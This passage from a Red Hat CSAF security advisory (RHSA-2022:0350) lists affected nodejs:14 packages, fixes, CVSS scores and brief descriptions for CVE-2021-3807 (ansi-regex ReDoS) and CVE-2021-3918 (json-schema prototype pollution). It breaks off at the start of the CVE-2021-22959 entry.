"https://bugzilla.redhat.com/show_bug.cgi?id=2007557" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3807", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3807" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3807", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3807" }, { "category": "external", "summary": "https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994", "url": "https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994" } ], "release_date": "2021-09-17T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-02-01T21:18:22+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0350" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes" }, { "cve": "CVE-2021-3918", "cwe": { "id": "CWE-915", "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes" }, "discovery_date": "2021-11-13T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2024702" } ], "notes": [ { "category": "description", "text": "The json-schema Node.JS library was vulnerable to prototype pollution during the validation of a JSON object. An attacker, able to provide a specially crafted JSON file for validation, could use this flaw to modify the behavior of the node program, to, for example, execute arbitrary code.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-json-schema: Prototype pollution vulnerability", "title": "Vulnerability summary" }, { "category": "other", "text": "npm versions 8.0.0 and older provide a vulnerable version of the json-schema library. However, it is currently believed that in the context of npm, it is not possible to take advantage of the vulnerability.\n\nRed Hat Enterprise Linux version 8 and Software Collections provide a vulnerable version of the json-schema library only as embedded in the npm package. As a result, the severity of the incident has been lowered for these 2 products.\n\nRed Hat Quay includes json-schema as a development dependency of quay-registry-container. As a result, the impact rating has been lowered to Moderate.\n\nIn Red Hat OpenShift Container Platform (RHOCP), Red Hat Openshift Data Foundations (ODF), Red Hat distributed tracing, Migration Toolkit for Virtualization (MTV) and Red Hat Advanced Cluster Management for Kubernetes (RHACM) the affected components are behind OpenShift OAuth. This restricts access to the vulnerable json-schema library to authenticated users only, therefore the impact is reduced to Moderate.\n\nIn Red Hat Openshift Data Foundations (ODF) the odf4/mcg-core-rhel8 component has \"Will not fix status\", but starting from ODF 4.11 stream this component contains already patched version of the json-schema library. Earlier version of ODF are already under Maintenance Support phase, hence this vulnerability will not be fixed.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3918" }, { "category": "external", "summary": "RHBZ#2024702", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024702" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3918", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3918" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3918", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3918" } ], "release_date": "2021-10-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-02-01T21:18:22+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0350" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-json-schema: Prototype pollution vulnerability" }, { "cve": "CVE-2021-22959", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP 